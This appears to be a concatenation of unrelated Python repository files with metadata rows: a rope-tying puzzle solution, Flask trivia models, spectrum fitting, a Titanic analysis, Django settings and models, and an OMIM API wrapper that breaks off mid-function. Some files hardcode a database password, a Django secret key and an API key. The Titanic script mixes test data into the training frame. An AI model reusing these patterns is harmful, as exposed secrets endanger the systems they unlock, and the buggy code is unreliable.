For a given integer K, the goal is to tie the ropes in such a way that the number of ropes whose length is greater than or equal to K is maximal.
For example, consider K = 4 and array A such that:
A[0] = 1
A[1] = 2
A[2] = 3
A[3] = 4
A[4] = 1
A[5] = 1
A[6] = 3
The ropes are shown in the figure below.
We can tie:
rope 1 with rope 2 to produce a rope of length A[1] + A[2] = 5;
rope 4 with rope 5 with rope 6 to produce a rope of length A[4] + A[5] + A[6] = 5.
After that, there will be three ropes whose lengths are greater than or equal to K = 4. It is not possible to produce four such ropes.
Write a function:
def solution(K, A)
that, given an integer K and a non-empty array A of N integers, returns the maximum number of ropes of length greater than or equal to K that can be created.
For example, given K = 4 and array A such that:
A[0] = 1
A[1] = 2
A[2] = 3
A[3] = 4
A[4] = 1
A[5] = 1
A[6] = 3
the function should return 3, as explained above.
Write an efficient algorithm for the following assumptions:
N is an integer within the range [1..100,000];
K is an integer within the range [1..1,000,000,000];
each element of array A is an integer within the range [1..1,000,000,000].
'''
# you can write to stdout for debugging purposes, e.g.
# print("this is a debug message")
def solution(K, A):
'''
Identify ropes that are smaller,
than K, and merge them together.
but dont merge with a rope that is already greater than K.
Or just look at first rope, if its less than K,
merge with right one,
'''
sum = 0
count = 0
for i in A:
if (sum + i) >= K:
count += 1
sum = 0
else:
sum += i
return count
| [
"harman.j.singh@hotmail.com"
] | harman.j.singh@hotmail.com |
88d8b4b02ec11ac221e79dfa1c21f25d8e3f2cfc | 1ff94dfea8fc7d350d0b60b2a3c96a7eca44fe50 | /backend/models.py | 473f7a115d8b3f07e878ea26cb012629644d8dae | [] | no_license | MohamedKhaledRamadan/Trivia | 94be9826f1c9c29156ca4bb6122245ab5361fec9 | a35e0fc68ebcbae99d41d533ef20b83f4566a03a | refs/heads/master | 2023-02-03T00:41:54.213545 | 2020-12-17T12:06:07 | 2020-12-17T12:06:07 | 321,483,321 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,635 | py | import os
from sqlalchemy import Column, String, Integer, create_engine
from flask_sqlalchemy import SQLAlchemy
import json
database_name = "trivia"
database_path = "postgres://{}/{}".format('postgres:01110931793@localhost:5432', database_name)
db = SQLAlchemy()
'''
setup_db(app)
binds a flask application and a SQLAlchemy service
'''
def setup_db(app, database_path=database_path):
    """Bind the Flask app to the shared SQLAlchemy service and create tables."""
    app.config["SQLALCHEMY_DATABASE_URI"] = database_path
    app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
    db.app = app
    db.init_app(app)
    db.create_all()
'''
Question
'''
class Question(db.Model):
  """A trivia question with its answer, category and difficulty rating."""
  __tablename__ = 'questions'
  id = Column(Integer, primary_key=True)
  question = Column(String)
  answer = Column(String)
  category = Column(String)
  difficulty = Column(Integer)
  def __init__(self, question, answer, category, difficulty):
    self.question = question
    self.answer = answer
    self.category = category
    self.difficulty = difficulty
  def insert(self):
    """Persist this question as a new row."""
    db.session.add(self)
    db.session.commit()
  def update(self):
    """Commit in-place changes made to this question."""
    db.session.commit()
  def delete(self):
    """Remove this question from the database."""
    db.session.delete(self)
    db.session.commit()
  def format(self):
    """Return a JSON-serialisable dict representation."""
    return {
      'id': self.id,
      'question': self.question,
      'answer': self.answer,
      'category': self.category,
      'difficulty': self.difficulty
      }
'''
Category
'''
class Category(db.Model):
  """A question category (matches Question.category by id)."""
  __tablename__ = 'categories'
  id = Column(Integer, primary_key=True)
  type = Column(String)
  def __init__(self, type):
    self.type = type
  def format(self):
    """Return a JSON-serialisable dict representation."""
    return {
      'id': self.id,
      'type': self.type
      }
"45246427+MohamedKhaledRamadan@users.noreply.github.com"
] | 45246427+MohamedKhaledRamadan@users.noreply.github.com |
836137976b1602bfd7b0c88ce367f8879ece8e32 | b80385c2906eabac01e32703e01d26069bdfb26e | /p521_gauss_fit_Eu_ge.py | 974706d58aa19f236a07fd895a856092d9099637 | [] | no_license | glastyp/p5_python_scipts | 6b8f435483b131057ca39cdb75c3e25f75bfe6c6 | 885d17b95a4a2aed11a5bd7535009074d8cc8eb9 | refs/heads/main | 2023-06-26T12:18:23.765986 | 2021-07-13T12:58:30 | 2021-07-13T12:58:30 | 366,188,869 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,119 | py | """
Created on Tue Nov 24 14:19:15 2020
@author: david
"""
import numpy as np
import matplotlib.pyplot as plt
import scipy.optimize
# Title for input- and output-file
TITLE = "gauss_fit_Eu_ge"
FILE = "Europium3_Dekt_Ge"
PARAMS = "%s_params.txt" % TITLE
output_filename = "%s.pdf" % TITLE
source_filename = "%s.txt" % FILE
xlabel = "Kanal"
ylabel = "Anzahl Ereignisse"
title = "Spektrum der Europium-Quelle mit Anpassung"
peaks = 10
width = 400
def gaus(x, a, b, c):
return a*np.exp(-(x-b)**2/(2*c**2))
def f(x, a, b, c, d, e):
return gaus(x, a, b, c) + x*d + e
alpha = 5.14
beta = -31.4
def comp(K):
return K/(1+(511-beta)/(2*alpha*K))
data = open(source_filename, 'r')
lines=data.readlines()
x=[]
y=[]
for i in lines:
x.append(float(i.split()[0]))
y.append(float(i.split()[2]))
data.close()
paramdata = open(PARAMS, 'r')
lines = paramdata.readlines()
params = []
for j in range(3):
for i in lines:
params.append(float(i.split()[j]))
paramdata.close()
d = -0.01
e = 100
for i in range(2):
for j in range(peaks):
params.append(d)
for j in range(peaks):
params.append(e)
fity = []
fitx = []
for i in range(peaks):
if(i == 9):
width = 250
cp = int(params[i+peaks]) # cp: current peak
cpar = [params[i], params[i+peaks], params[i + 2*peaks], params[i + 3*peaks], params[i + 4*peaks]]
fit_params, pcov = scipy.optimize.curve_fit(f, x[cp -width:cp + width], y[cp-width:cp+width], p0=cpar)
perr = np.sqrt(np.diag(pcov))
print(fit_params)
for j in range(2*width):
fity.append(f(x[cp+j-width],*fit_params))
fitx.append(x[cp+j-width])
fig_U = plt.figure(dpi=400)
plt.title(title,y=1.08)
plt.xlabel(xlabel)
plt.ylabel(ylabel)
plt.plot(fitx, fity, color = 'r', label="Anpassung", zorder=2)
plt.scatter(x, y, color='black', marker = '+', s=10, linewidths = 0.4, label="Messwerte", zorder=1)
plt.legend(loc='best')
plt.grid(True, zorder=0)
fig_U.savefig(output_filename) | [
"noreply@github.com"
] | glastyp.noreply@github.com |
62f9d527f1538ca78f849e30e50bf5cd1979879e | afd773c1659d1104d7a39130d796c727b1836ac5 | /data_exploration.py | 4cbad90bd506b251d46c9db5fc30abce8e0f3074 | [] | no_license | benoitme/kaggle_titanic | 4168571e73cd033251db5669250ff08df3bde004 | 1b50e84daf5ae08591066c4b9bf753a88d7e1927 | refs/heads/master | 2021-01-19T17:04:15.815861 | 2017-08-30T14:38:22 | 2017-08-30T14:38:22 | 101,043,345 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,491 | py | # Import packages
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import math
# Data import
raw_data = pd.read_csv('data/train.csv')
raw_test = pd.read_csv("data/test.csv")
# Let's start by looking at the data
print(raw_data.head())
print('---------------------------------------------')
print(raw_data.info())
print('---------------------------------------------')
print(raw_data.describe())
print('---------------------------------------------')
# General analysis : number of Nan in the data
print(raw_data.isnull().sum())
# Visual data analysis
# Let's display plots of the different characteristics
# Transform data in something more 'readable' for ML algorithms
train = pd.DataFrame()
train["Pclass"] = raw_data["Pclass"]
train["NameLen"] = raw_data["Name"].apply(len)
train["Sex"] = raw_data["Sex"].apply(lambda x: 0 if x =="female" else 1)
train["Age"] = raw_data["Age"].apply(lambda x: 0 if math.isnan(x) else int(x))
train["Cabin"] = raw_data["Cabin"].apply(lambda x: 0 if type(x) == float else 1)
train["SibSp"] = raw_data["SibSp"]
train["Parch"] = raw_data["Parch"]
train['Fare'] = raw_data['Fare']
raw_data['Embarked'] = raw_data['Embarked'].fillna(value='S')
train["Embarked"] = raw_data['Embarked'].map( {'S': 0, 'C': 1, 'Q': 2} ).astype(int)
train["Survived"] = raw_data["Survived"]
train.index = raw_data["PassengerId"]
# Same thing on test sample
test = pd.DataFrame()
test["PassengerId"] = raw_test["PassengerId"]
test["Pclass"] = raw_test["Pclass"]
test["NameLen"] = raw_test["Name"].apply(len)
test["Sex"] = raw_test["Sex"].apply(lambda x: 0 if x =="female" else 1)
test["Age"] = raw_test["Age"].apply(lambda x: 0 if math.isnan(x) else int(x))
test["Cabin"] = raw_test["Cabin"].apply(lambda x: 0 if type(x) == float else 1)
test["SibSp"] = raw_test["SibSp"]
test["Parch"] = raw_test["Parch"]
test['Fare'] = raw_test['Fare']
raw_test['Embarked'] = raw_test['Embarked'].fillna(value='S')
train["Embarked"] = raw_test['Embarked'].map( {'S': 0, 'C': 1, 'Q': 2} ).astype(int)
# Lets plot the different features to see the most significant ones
# With the SEM we can see which features are the most significant
# Age does not seem to be that significant for instance
# Of course "Survived" is the most significant ;)
i = 0
f, ax = plt.subplots(8, 1, figsize=(4,12))
f.subplots_adjust(hspace=1.5)
for column in train.columns:
ax[i].set_title(column)
ax[i].bar(train.groupby(column).Survived.mean().index,train.groupby(column).Survived.mean(), yerr=train[column].sem())
i+=1
plt.show()
# Pairplot
colormap = plt.cm.viridis
plt.figure(figsize=(12,12))
plt.title('Pearson Correlation of Features', y=1.05, size=15)
sns.heatmap(train.astype(float).corr(),linewidths=0.1,vmax=1.0, square=True, cmap=colormap, linecolor='white', annot=True)
plt.show()
# Let's do a cross validation for aaaaalll the models
from sklearn.model_selection import train_test_split
X = train[["Pclass", "NameLen", "Sex", "Age", "Cabin", "SibSp", "Parch"]]
y = np.ravel(train["Survived"])
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=0)
# All the classifiers models
from sklearn.neural_network import MLPClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn.gaussian_process import GaussianProcessClassifier
from sklearn.gaussian_process.kernels import RBF
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis
names = ["Nearest Neighbors", "Linear SVM", "RBF SVM", "Gaussian Process",
"Decision Tree", "Random Forest", "Neural Net", "AdaBoost",
"Naive Bayes", "QDA"
]
classifiers = [
KNeighborsClassifier(),
SVC(kernel="linear"),
SVC(kernel="rbf"),
GaussianProcessClassifier(),
DecisionTreeClassifier(),
RandomForestClassifier(n_estimators=1000),
MLPClassifier(),
AdaBoostClassifier(),
GaussianNB(),
QuadraticDiscriminantAnalysis()
]
from sklearn.model_selection import cross_val_score
# Iterate over classifiers
results = {}
for name, clf in zip(names, classifiers):
scores = cross_val_score(clf, X_train, y_train, cv=5)
results[name] = scores
for name, scores in results.items():
print("%20s | Accuracy: %0.2f%% (+/- %0.2f%%)" % (name, 100*scores.mean(), 100*scores.std() * 2)) | [
"lelabodebiologie@gmail.com"
] | lelabodebiologie@gmail.com |
8ebf88061c9c452051abab23fa377846fbc9caaa | edf195dddd13ad6818a47c3332d7c435d166f87f | /todolist/base/models.py | 02d1fcc9d2817715d203a4f7238c81684a6d3df9 | [] | no_license | demidenko406/Todo | 1441cf1c3093aa468bab42751b9f3428c2fbc592 | 267ab6ab3cba71a11c468bed312feba41064856f | refs/heads/master | 2023-05-08T18:06:28.300614 | 2021-06-04T19:23:39 | 2021-06-04T19:23:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 781 | py | from django.db import models
from django.contrib.auth.models import User
class TaskTags(models.Model):
user = models.ForeignKey(User,on_delete=models.CASCADE,null=True,blank=True)
title = models.CharField(max_length=200)
def __str__(self):
return self.title
class Meta:
ordering = ['title']
class Task(models.Model):
user = models.ForeignKey(User,on_delete=models.CASCADE,null=True,blank=True)
title = models.CharField(max_length=200)
description = models.TextField(null=True,blank = True)
complete = models.BooleanField(default=False)
tag = models.ManyToManyField(TaskTags,blank=True,related_name = 'tag')
def __str__(self):
return self.title
class Meta:
ordering = ['complete']
| [
"kalacey@yandex.by"
] | kalacey@yandex.by |
94da2d74654699c85f732d2a1992d5b50ed9256d | 20d629213966c711d4d9b08bc75046cbe799c5eb | /auto-project/case/test_member_balance.py | aa725b5b51bacace8040814c010ee09ad5c1c71c | [] | no_license | evebjayson/test | d234d8f71b227617aa8f516e9563628e0f67c1f3 | c62a4e9e029fb77a307fe802518f12f1bcb31df1 | refs/heads/master | 2020-04-08T14:31:58.959641 | 2019-01-11T09:50:29 | 2019-01-11T09:50:29 | 159,440,791 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 832 | py | import unittest
from common.logger import Log
from common import base
class MemberBalance(unittest.TestCase):
def setUp(self):
self.log = Log()
def test_MemberBalance(self):
'''查询余额'''
route = "/unity/AB/queryqueryBalance"
url = "".join(base.get_url(route))
json = {"siteCode":"ybh",
"userName":"Wo6laX7wDtQj",
}
kwargs = {"json":json}
Method = "post"
resp = base.get_response(url, Method, **kwargs)
self.log.info("-------------start------------")
self.assertEqual(resp.status_code,200,msg="失败原因:%s != %s" %(resp.status_code,200))
self.log.info("----------test is pass----------")
self.log.info("--------------end-------------")
if __name__ == "__main__":
unittest.main() | [
"jayson@e-veb.com"
] | jayson@e-veb.com |
b865ed29544137c57a34d629b4e1e5a5df3b471c | 106fb0868724032e5d9ebee8721af8d333b1a7fb | /cron_events.py | a6c05a6368ebe7cfd0c356c4cc20a8a8bf0ed682 | [] | no_license | ryan-mccaffrey/vote-reminder | 9e3f97555aaa801231010e60cd4064a6661e41e5 | c34bff14515d1249eba931948daf0f89cae92341 | refs/heads/master | 2022-10-07T14:48:49.931393 | 2020-06-09T07:23:53 | 2020-06-09T07:23:53 | 270,488,646 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 92 | py | from main_runner import main_send_events
if __name__ == '__main__':
main_send_events()
| [
"ryan.mccaffrey.42@gmail.com"
] | ryan.mccaffrey.42@gmail.com |
685fda18ad8cf4719f324feb24e823122bb0d341 | 795df757ef84073c3adaf552d5f4b79fcb111bad | /stochastic_diffusion/diffusivity_1d_xk.py | 62a6b21a6bbb4ecffa0bba1ee3ca9d405324092c | [] | no_license | tnakaicode/jburkardt-python | 02cb2f9ba817abf158fc93203eb17bf1cb3a5008 | 1a63f7664e47d6b81c07f2261b44f472adc4274d | refs/heads/master | 2022-05-21T04:41:37.611658 | 2022-04-09T03:31:00 | 2022-04-09T03:31:00 | 243,854,197 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,885 | py | #! /usr/bin/env python3
#
def diffusivity_1d_xk ( dc0, m, omega, n, x ):
#*****************************************************************************80
#
## DIFFUSIVITY_1D_XK evaluates a 1D stochastic diffusivity function.
#
# Discussion:
#
# The 1D diffusion equation has the form
#
# - d/dx ( DC(X) Del U(X) ) = F(X)
#
# where DC(X) is a function called the diffusivity.
#
# In the stochastic version of the problem, the diffusivity function
# includes the influence of stochastic parameters:
#
# - d/dx ( DC(XOMEGA) d/dx U(X) ) = F(X).
#
# In this function, the domain is assumed to be the unit interval [0.1].
#
#
# For DC0 = 1 and F(X) = 0, with boundary conditions U(0:OMEGA) = 0,
# U(1OMEGA) = 1, the exact solution is
#
# If OMEGA ~= 0:
#
# U(XOMEGA) = log ( 1 + OMEGA * X ) / log ( 1 + OMEGA )
#
# If OMEGA = 0:
#
# U(XOMEGA) = X
#
# In the numerical experiments described in the paper, OMEGA was taken
# to be a random variable with a Beta, or Uniform, or Gaussian or
# Poisson or Binomial distribution.
#
# For the Gaussian and Poisson distributions, the positivity requirement could not
# be guaranteed, and the experiments were simply made with a "small"
# variance of 0.1.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 20 December 2009
#
# Author:
#
# John Burkardt
#
# Reference:
#
# Dongbin Xiu, George Karniadakis,
# Modeling uncertainty in steady state diffusion problems via
# generalized polynomial chaos,
# Computer Methods in Applied Mechanics and Engineering,
# Volume 191, 2002, pages 4927-4948.
#
# Parameters:
#
# Input, real DC0, the constant term in the expansion of the
# diffusion coefficient.
#
# Input, integer M, the number of stochastic parameters.
#
# Input, real OMEGA(M), the stochastic parameters.
#
# Input, integer N, the number of evaluation points.
#
# Input, real X(N), the point where the diffusion coefficient is to
# be evaluated.
#
# Output, real DC(N), the value of the diffusion coefficient at X.
#
import numpy as np
k = 0
w = 1.0
arg = np.zeros(n)
while ( k < m ):
if ( k < m ):
arg = arg + omega[k] * np.sin ( w * np.pi * x )
k = k + 1
if ( k < m ):
arg = arg + omega[k] * np.cos ( w * np.pi * x )
k = k + 1
w = w + 1.0
arg = np.exp ( - 0.125 ) * arg
dc = dc0 + np.exp ( arg )
return dc
def diffusivity_1d_xk_contour ( ):
#*****************************************************************************80
#
## diffusivity_1d_xk_contour displays contour plots of a 1D stochastic diffusivity function.
#
# Discussion:
#
# The diffusivity function is compute by DIFFUSIVITY_1D_XK.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 08 February 2019
#
# Author:
#
# John Burkardt
#
# Reference:
#
# Dongbin Xiu, George Karniadakis,
# Modeling uncertainty in steady state diffusion problems via
# generalized polynomial chaos,
# Computer Methods in Applied Mechanics and Engineering,
# Volume 191, 2002, pages 4927-4948.
#
import matplotlib.pyplot as plt
import numpy as np
print ( '' )
print ( 'diffusivity_1d_xk_contour' )
print ( ' Display the stochastic diffusivity function' )
print ( ' defined by DIFFUSIVITY_1D_XK.' )
#
# Set the spatial grid.
#
n = 51
x_min = -1.0
x_max = +1.0
x = np.linspace ( x_min, x_max, n )
#
# Sample the OMEGA values.
# Use a seed of 0 for the MATLAB random number generator.
#
m = 5
omega = np.random.randn ( m )
#
# Compute the diffusivity field.
#
dc0 = 10.0
dc = diffusivity_1d_xk ( dc0, m, omega, n, x )
#
# Plot the diffusivity field.
#
plt.plot ( x, dc, linewidth = 2 )
plt.grid ( True )
plt.xlabel ( '<--- X --->' )
plt.ylabel ( 'DC(X)' )
plt.title ( 'XK Stochastic diffusivity function' )
filename = 'diffusivity_1d_xk.png'
plt.savefig ( filename )
print ( '' )
print ( ' Graphics saved as "%s".' % ( filename ) )
return
def diffusivity_1d_xk_test ( ):
#*****************************************************************************80
#
## diffusivity_1d_xk_test tests diffusivity_1d_xk.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 08 February 2019
#
# Author:
#
# John Burkardt
#
# Parameters:
#
# None
#
import platform
print ( '' )
print ( 'diffusivity_1d_xk_test:' )
print ( ' Python version: %s' % ( platform.python_version ( ) ) )
print ( ' Test diffusivity_1d_xk.' )
diffusivity_1d_xk_contour ( )
#
# Terminate.
#
print ( '' )
print ( 'diffusivity_1d_xk_test:' )
print ( ' Normal end of execution.' )
return
if ( __name__ == '__main__' ):
from timestamp import timestamp
timestamp ( )
diffusivity_1d_xk_test ( )
timestamp ( )
| [
"tnakaicode@gmail.com"
] | tnakaicode@gmail.com |
e61a78e5bcc8ba3dc3f0285b748ddd0da2eb5458 | 4bc0cbd983e8bb99c369e2b056d1f046028ddc02 | /tests/pass/pass/settings.py | 28e3ebad4cf8372c5afc7b7b876883313400ca32 | [
"CC0-1.0",
"LicenseRef-scancode-public-domain"
] | permissive | dfrankow/django-template-check | cacdfbe706917cf5792bd84ac899ddccfcda1001 | e8a846a48b352190d28d6785445924a8158fbde6 | refs/heads/master | 2023-03-18T16:33:03.400387 | 2020-10-02T17:48:13 | 2020-10-02T17:48:13 | 348,676,153 | 0 | 0 | CC0-1.0 | 2021-03-17T10:57:58 | 2021-03-17T10:57:57 | null | UTF-8 | Python | false | false | 3,138 | py | """
Django settings for pass project.
Generated by 'django-admin startproject' using Django 1.11.8.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '^lwe(bt4(7fh^tg8x7o5yixwce0b8kdje&ld2g&%rgp3xt5$h='
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_template_check',
'templateapp',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'pass.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'pass.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
| [
"thom@thomwiggers.nl"
] | thom@thomwiggers.nl |
f4f21fb5b2c269df3326b786e78e6edc3d4fb923 | 5b002b82b025ee371432b436a0c19b000a0df2dd | /setup.py | 93cb4423f1905fc32138f022a24043d62d1e8831 | [
"Apache-2.0"
] | permissive | mvexel/whathappened | c5bfeeb1f41b20cd2f5f4c7782412a39090868b2 | 92805128d2a01909d89fca0650b585d8cac256e0 | refs/heads/master | 2021-01-19T09:10:53.189344 | 2017-04-10T00:05:24 | 2017-04-10T00:05:24 | 87,735,951 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 220 | py | from setuptools import setup
setup(
name='whathappened',
packages=['whathappened'],
include_package_data=True,
install_requires=[
'flask',
'requests',
'gunicorn==19.7.0'
],
)
| [
"m@rtijn.org"
] | m@rtijn.org |
cd55a433bc2477bd804d1a7458298478ea1ddffa | 8b97218060d1384b69bb3e286c35e45d1248addf | /leetcode/初级算法-字符串/example.py | 1459b7502f367ec45863cfe21b48e788083a9f4d | [] | no_license | Rooters123/code_calc | a14d155b5c4fdf14366528f55efe63f4f3e02a92 | ca7cc303aeec5eedfb6557562c2cdcb933d3b583 | refs/heads/main | 2023-06-25T11:18:04.995235 | 2021-07-31T07:02:49 | 2021-07-31T07:02:49 | 386,817,254 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,283 | py | # encoding = utf-8
from threading import Thread,Lock,RLock
import time
# 互斥锁
# node_lock = Lock()
# fork_lock = Lock()
node_lock = fork_lock = RLock()
def eat1(name):
# 吃面前的准备
node_lock.acquire()
print("%s拿到面"%name)
fork_lock.acquire()
print("%s拿到叉子"%name)
print("%s开始吃面"%name)
# 吃面后的准备
fork_lock.release()
node_lock.release()
def eat2(name):
# 吃面前的准备,这里是先拿叉子,
fork_lock.acquire()
print("%s拿到叉子" % name)
node_lock.acquire()
print("%s拿到面"%name)
# 这里可以保证一定会产生死锁现象
time.sleep(1)
print("%s开始吃面"%name)
# 吃面后的准备
node_lock.release()
fork_lock.release()
# Thread(target=eat1,args=("zbr",)).start()
# Thread(target=eat2,args=("wdq",)).start()
# Thread(target=eat1,args=("ljy",)).start()
# Thread(target=eat2,args=("lw",)).start()
class test():
def __init__(self):
self.name = "zbr"
@classmethod
def classFunc(cls):
print("我是类方法")
pass
@staticmethod
def staticFunc():
print("我是静态方法")
pass
a = test()
a.classFunc()
| [
"noreply@github.com"
] | Rooters123.noreply@github.com |
cf35173b62a18fc6975721085bd9b534f7ed5298 | 1359e7693cfc2b44002a92a04b82c15fc8810cf8 | /src/screens/loginWindow.py | 373fa90815d0aa4183eb97568ff4952bf6c922d7 | [
"MIT"
] | permissive | tpetersheim-team/tuck | 58ccd07078a7641393aaeec72afd36d895b238a0 | 2e97fe17405cc829b48c4bf20155809f3af94fda | refs/heads/main | 2023-03-12T19:55:35.380050 | 2021-02-06T17:10:46 | 2021-02-06T17:10:46 | 305,575,085 | 2 | 0 | MIT | 2021-03-03T04:17:05 | 2020-10-20T03:06:05 | Python | UTF-8 | Python | false | false | 4,997 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Login Window for Tuck
"""
# Futures
from __future__ import print_function
# Built-in/Generic Imports
import os
import sys
from typing import Text
from PyQt5.QtCore import pyqtSignal
# Libraries
from PyQt5.QtWidgets import (QCheckBox, QMainWindow, QVBoxLayout, QHBoxLayout, QLabel,
QPushButton, QWidget, QLineEdit)
# Own modules
from stockAPI import StockAPI
from screens.utilities.alertUtility import AlertUtility
# Header release information
__author__ = 'Travis Petersheim & Michael Reichenberger'
__copyright__ = 'Copyright 2020, Friar Tuck'
__credits__ = ['']
__license__ = 'MIT'
__version__ = '0.0.0'
__maintainer__ = 'Travis Petersheim'
__email__ = 'travispetersheim@gmail.com'
__status__ = 'prototype'
class LoginWindow(QMainWindow):
loginSuccess = pyqtSignal()
# Functions
# Initialization
def __init__(self, parent, stockAPI: StockAPI):
super(LoginWindow, self).__init__(parent)
self.stockAPI: StockAPI = stockAPI
self.setWindowTitle("Login")
self.main()
# Main application
def main(self):
# Build the window layout
centralWidget = QWidget(self)
self.setCentralWidget(centralWidget)
mainLayout = QVBoxLayout(self)
centralWidget.setLayout(mainLayout)
userNameLayout = QHBoxLayout(self)
mainLayout.addLayout(userNameLayout)
passwordLayout = QHBoxLayout(self)
mainLayout.addLayout(passwordLayout)
mfaLayout = QHBoxLayout(self)
mainLayout.addLayout(mfaLayout)
stayLoggedInCheckboxLayout = QHBoxLayout(self)
mainLayout.addLayout(stayLoggedInCheckboxLayout)
loginButtonLayout = QHBoxLayout(self)
mainLayout.addLayout(loginButtonLayout)
labelWidth: int = 65
# Add a label for username
userNameLabel = QLabel("Username: ", self)
userNameLabel.setFixedWidth(labelWidth)
userNameLayout.addWidget(userNameLabel)
userNameLabel.show()
# Add a text box for username
self.usernameTextBox = QLineEdit(self)
userNameLayout.addWidget(self.usernameTextBox)
# Add a label for password
passwordLabel = QLabel("Password: ", self)
passwordLabel.setFixedWidth(labelWidth)
passwordLayout.addWidget(passwordLabel)
passwordLabel.show()
# Add a text box for password
self.passwordTextBox = QLineEdit(self)
passwordLayout.addWidget(self.passwordTextBox)
self.passwordTextBox.setEchoMode(QLineEdit.Password)
# Add a label for MFA
mfaLabel = QLabel("MFA Token: ", self)
mfaLabel.setFixedWidth(labelWidth)
mfaLayout.addWidget(mfaLabel)
mfaLabel.show()
# Add a text box for MFA
self.mfaTextBox = QLineEdit(self)
mfaLayout.addWidget(self.mfaTextBox)
# Add checkbox to save login
self.stayLoggedInCheckbox = QCheckBox(self)
self.stayLoggedInCheckbox.setFixedWidth(15)
stayLoggedInCheckboxLayout.addWidget(self.stayLoggedInCheckbox)
# add label for checkbox to save login
stayLoggedInLabel = QLabel(" Stay Logged In?")
stayLoggedInCheckboxLayout.addWidget(stayLoggedInLabel)
# Add a Login button
loginButton = QPushButton("Login", self)
loginButtonLayout.addWidget(loginButton)
# Setup the login button-click action
loginButton.clicked.connect(self.onLoginButtonClicked)
loginButton.setDefault(True)
# Funciton for the button click
def onLoginButtonClicked(self):
username = self.usernameTextBox.text()
password = self.passwordTextBox.text()
mfa = self.mfaTextBox.text()
stayLoggedIn = self.stayLoggedInCheckbox.isChecked()
if not username or not password or not mfa:
AlertUtility.ShowAlert("Username, password, and mfa required")
return
try:
if self.stockAPI.Login(username, password, stayLoggedIn, mfa):
AlertUtility.ShowAlert(f"Successful Login to Robinhood as {username}", self.onAlertButtonClicked)
except Exception as e:
AlertUtility.ShowAlert(f"Login Error: {e}")
def onAlertButtonClicked(self):
self.loginSuccess.emit()
| [
"travispetersheim@gmail.com"
] | travispetersheim@gmail.com |
12d05be280b79cbfe3371ac8145825a52ec3ba4f | 9194738f0a52455b355f0262f39f8c7bcdb82a55 | /lib/omim_api.py | fd69b5a9a04de92fea80669fc03627a0369d50c4 | [] | no_license | jjevans/tools | 5e6de81b98ff7ad80abf3575122d002513dcc06f | 9113ca727e0d45a6f224a683bc0057a7d7b1549c | refs/heads/master | 2021-01-01T19:48:06.216054 | 2017-07-28T21:37:45 | 2017-07-28T21:37:45 | 98,688,731 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,924 | py | import json
import requests as req
import xml.etree.ElementTree as ET
''' utilize the OMIM api to retrieve data via web service '''
''' api key for 2014 2EF035ECBD2E73BA368BECD371EA3E9E35D84034 '''
class Use():
def __init__(self,apikey,url="http://api.omim.org/api"):
self.key = apikey
self.url = url # url without handler
self.pars = {"apiKey" : self.key,
"format" : "json"}
def get_req(self,handyurl):
try:
